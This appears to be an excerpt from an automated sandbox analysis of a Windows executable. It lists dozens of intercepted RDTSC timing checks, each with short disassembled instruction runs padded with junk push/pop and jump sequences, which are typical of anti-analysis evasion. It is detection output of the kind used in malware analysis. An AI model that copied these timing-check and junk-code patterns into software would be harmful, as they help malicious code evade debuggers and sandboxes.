                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725EB9 second address: 725EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725EBD second address: 725EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725EC1 second address: 725EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725EE0 second address: 725EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261E3 second address: 7261E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261E9 second address: 7261F7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6254D230B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261F7 second address: 72620A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873EFh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726614 second address: 726634 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6254D230BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6254D230BCh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7267C0 second address: 7267D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873EBh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E593 second address: 72E5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E5A5 second address: 72E5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F5h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D16E second address: 72D18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D18B second address: 72D1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F6254B873EEh 0x00000012 jmp 00007F6254B873F4h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D1D4 second address: 72D1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D513 second address: 72D520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D684 second address: 72D695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edi 0x00000008 jbe 00007F6254D230B6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D695 second address: 72D6A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F6254B873E6h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735C67 second address: 735C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6254D230BEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735C86 second address: 735CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F6254B873E6h 0x0000000b jmp 00007F6254B873F5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7358A3 second address: 7358A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747369 second address: 747388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F6254B873E6h 0x0000000c jmp 00007F6254B873F3h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747388 second address: 74738C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74738C second address: 7473CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6254B873F5h 0x00000013 js 00007F6254B873E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7473CA second address: 7473DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6254D230C0h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7473DF second address: 7473E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6254B873E6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7473E9 second address: 74740D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F6254D230B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F6254D230C5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7470AF second address: 7470C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 jns 00007F6254B873EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7470C8 second address: 7470CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748ADB second address: 748AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edi 0x00000007 jnp 00007F6254B873ECh 0x0000000d push ebx 0x0000000e jmp 00007F6254B873EBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D281 second address: 74D28B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6254D230BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D28B second address: 74D2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6254B873F2h 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536BB second address: 7536C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536C1 second address: 7536C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75626F second address: 756275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756275 second address: 75629B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6254B873EFh 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75629B second address: 7562B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F6254D230BDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D7EC second address: 75D7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D7F0 second address: 75D7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D7F4 second address: 75D813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6254B873F7h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DED3 second address: 75DEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6254D230B6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEDD second address: 75DEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEE1 second address: 75DEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEED second address: 75DEF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEF3 second address: 75DEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E039 second address: 75E03F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1C8 second address: 75E1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F6254D230C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EBC9 second address: 75EBCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EBCE second address: 75EBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EBD4 second address: 75EBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7607FF second address: 760822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6254D230C6h 0x0000000c jne 00007F6254D230B6h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760822 second address: 760828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763FD4 second address: 763FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763B8F second address: 763BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254B873F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770355 second address: 770371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230BDh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jno 00007F6254D230B6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770371 second address: 770379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770379 second address: 77037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77037D second address: 770381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775166 second address: 77517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F6254D230BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77517A second address: 7751AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F8h 0x00000009 jo 00007F6254B873E6h 0x0000000f popad 0x00000010 jmp 00007F6254B873EDh 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7751AD second address: 7751D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F6254D230C8h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777171 second address: 777177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786B5A second address: 786B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6254D230B6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786B64 second address: 786BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F6254B873E6h 0x0000000d jmp 00007F6254B873F6h 0x00000012 jmp 00007F6254B873ECh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6254B873F2h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786707 second address: 78670D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0EB7 second address: 7A0EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0EBB second address: 7A0ECF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6254D230B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6254D230BAh 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A11BA second address: 7A11BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A164C second address: 7A1659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F6254D230B8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A17CC second address: 7A17D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1971 second address: 7A1975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1975 second address: 7A198D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6254B873E6h 0x00000008 jmp 00007F6254B873EEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A198D second address: 7A19A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230BBh 0x00000009 jmp 00007F6254D230BCh 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1AD0 second address: 7A1AF6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6254B873E6h 0x00000008 jmp 00007F6254B873ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007F6254B873E6h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1AF6 second address: 7A1AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1AFC second address: 7A1B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A76EE second address: 7A7721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6254D230C7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e js 00007F6254D230B8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7721 second address: 7A7725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7725 second address: 7A772F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6254D230B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A79C7 second address: 7A79D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6254B873E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A79D1 second address: 7A79D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A79D8 second address: 7A7A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6254B873EDh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F6254B873F8h 0x00000016 mov eax, dword ptr [eax] 0x00000018 js 00007F6254B873FFh 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A92DA second address: 7A92E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A92E0 second address: 7A92E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A92E4 second address: 7A92FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F6254D230B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F6254D230BBh 0x00000014 pop ecx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A92FF second address: 7A9312 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6254B873EEh 0x00000008 jl 00007F6254B873E6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8EA2 second address: 7A8EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F6254D230B6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60144 second address: 4A60174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, B593h 0x00000010 push eax 0x00000011 mov ecx, edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60174 second address: 4A60178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60178 second address: 4A6017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50031 second address: 4A5005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F6254D230C3h 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A90023 second address: 4A90087 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6254B873F8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F6254B873EBh 0x00000010 sbb ah, FFFFFFAEh 0x00000013 jmp 00007F6254B873F9h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6254B873F8h 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A90087 second address: 4A90096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A90096 second address: 4A900C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6254B873ECh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A900C2 second address: 4A900D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230BEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A900D4 second address: 4A9012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, 43h 0x0000000c mov esi, 4C001965h 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 jmp 00007F6254B873F0h 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6254B873F8h 0x00000023 jmp 00007F6254B873F5h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
